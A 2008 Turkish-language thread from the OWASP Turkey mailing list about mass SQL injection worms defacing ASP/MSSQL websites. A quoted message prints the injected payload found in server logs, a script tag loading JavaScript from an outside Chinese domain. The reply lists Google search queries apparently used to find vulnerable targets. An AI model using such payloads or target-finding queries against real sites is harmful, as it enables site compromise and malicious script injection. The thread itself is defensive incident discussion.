<html>
<head>
<style>
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
FONT-SIZE: 10pt;
FONT-FAMILY:Tahoma
}
</style>
</head>
<body class='hmmessage'>&nbsp;<BR>
Merhaba,<BR>
Bu saldirilar&nbsp;bir worm seklinde midir bilmiyorum ama kesin bisey soylemek guc tabi. Gecen&nbsp;ay ve bu ay "massive sql injection"&nbsp;basligi altinda raporlar, haberler cikmisti. Ilgili saldirilarin (hatta saldiriyi yapmak icin kullanilan Cin kaynakli uygulamanin) analizini asagidaki linkten okumustum.<BR>
&nbsp;<BR>
<A href="http://isc.sans.org/diary.html?n&amp;storyid=4294">http://isc.sans.org/diary.html?n&amp;storyid=4294</A><BR>
&nbsp;<BR>
Kisaca uygulama, kurbanlarini google kullanarak asp sayfalarindan ve bu sayfalarda a parametresi (URL'de olunca tabi insanin aklina GET yerine POST kullanmanin hic de o kadar hafife alinmamasi gereken bi teknik/oneri oldugu geliyor) kullananlardan&nbsp;seciyormus. Google'dan arattim;<BR>
&nbsp;<BR>
<EM>inurl:.asp inurl:a=</EM><BR>
<STRONG></STRONG>&nbsp;<BR>
ve <STRONG>3,220,000</STRONG> sonuc cikti. Bunlardan 10,000'i 20,000'i hacklenmis cok mu? :P (Bu a&nbsp;isminin bi sihri var herhaldeki bu kadar gelistirici kullanmis) Yanliz<BR>
&nbsp;<BR>
<EM>inurl:.asp inurl:b=</EM><BR>
<EM></EM>&nbsp;<BR>
sorgusu <STRONG>5,560,000</STRONG> sonuc veriyor. Yani daha iyi (saldirgan acisindan). Hatta<BR>
&nbsp;<BR>
<EM>inurl:.asp inurl:c=</EM><BR>
<EM></EM>&nbsp;<BR>
sorgusu <STRONG>14,100,000</STRONG> sonuc veriyor. Yani belki de uygulamanin&nbsp;saldiramayacagi kadar fazla... <BR>
&nbsp;<BR>
<BR>bedirhan<BR><BR><BR>

<HR id=stopSpelling>
<BR>
&gt; Date: Mon, 12 May 2008 13:18:53 +0300<BR>&gt; From: huzeyfe@lifeoverip.net<BR>&gt; To: owasp-turkey@lists.owasp.org<BR>&gt; Subject: Re: [Owasp-turkey] SQL Injection kullanan WORM'lar<BR>&gt; <BR>&gt; Selamlar,<BR>&gt; <BR>&gt; benzer turde wormu -yontemi ayni, arac ve amaclar degisik- bir aydir <BR>&gt; farkli sekilde ben ilgiyle izliyorum*. Sadece MSSQL'i i ilgilendirse de <BR>&gt; Mysql kullanan sistemlerin loglarinda da denemeleri goruyoruz.<BR>&gt; <BR>&gt; <BR>&gt; Aslinda bu son worm hadisesi web tarafinin guvenligini -sayfa icerigi <BR>&gt; degistirilmedikce(deface)- cok dikkate almayan sirket yoneticilerini <BR>&gt; biraz daha ikna etmis oldu.<BR>&gt; <BR>&gt; *http://blog.lifeoverip.net/index.php/2008/04/30/son-gunlerin-seri-sql-injection-saldirilarina-dair/<BR>&gt; <BR>&gt; Deniz CEVIK wrote:<BR>&gt; &gt; Selamalar,<BR>&gt; &gt; <BR>&gt; &gt; Son iki haftadır 4-5 yerden siteleri değiştirildiğine dair şikayetler<BR>&gt; &gt; geldi. Sunucu loglarını detaylı incelediğimde aynı SQL injection<BR>&gt; &gt; pattern'i ile karşılaştık. SQL injectioni inceleyince tüm sistem<BR>&gt; &gt; tablolarına aşağıdaki gibi bir kayıtlar eklediği anlaşılıyor. Oldukça<BR>&gt; &gt; zararlı bir kod. Sql injection açığı bulunan sitelere banner ekleyerek<BR>&gt; &gt; para kazanmayı amaçlayan saldırılar ve çoğu çin kökenli.<BR>&gt; &gt; <BR>&gt; &gt; &lt;/title&gt;&lt;/pre&gt;"&gt;&lt;script src=http://1.hao929.cn/ads.js&gt;&lt;/script&gt;&lt;!--<BR>&gt; &gt; <BR>&gt; &gt; http://isc.incidents.org/diary.html?storyid=4393<BR>&gt; &gt; _______________________________________________<BR>&gt; &gt; Owasp-turkey mailing list<BR>&gt; &gt; Owasp-turkey@lists.owasp.org<BR>&gt; &gt; https://lists.owasp.org/mailman/listinfo/owasp-turkey<BR>&gt; _______________________________________________<BR>&gt; Owasp-turkey mailing list<BR>&gt; Owasp-turkey@lists.owasp.org<BR>&gt; https://lists.owasp.org/mailman/listinfo/owasp-turkey<BR><BR><br /><hr />Windows Live SkyDrive lets you share files with faraway friends. <a href='http://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_052008' target='_new'>Start sharing.</a></body>
</html>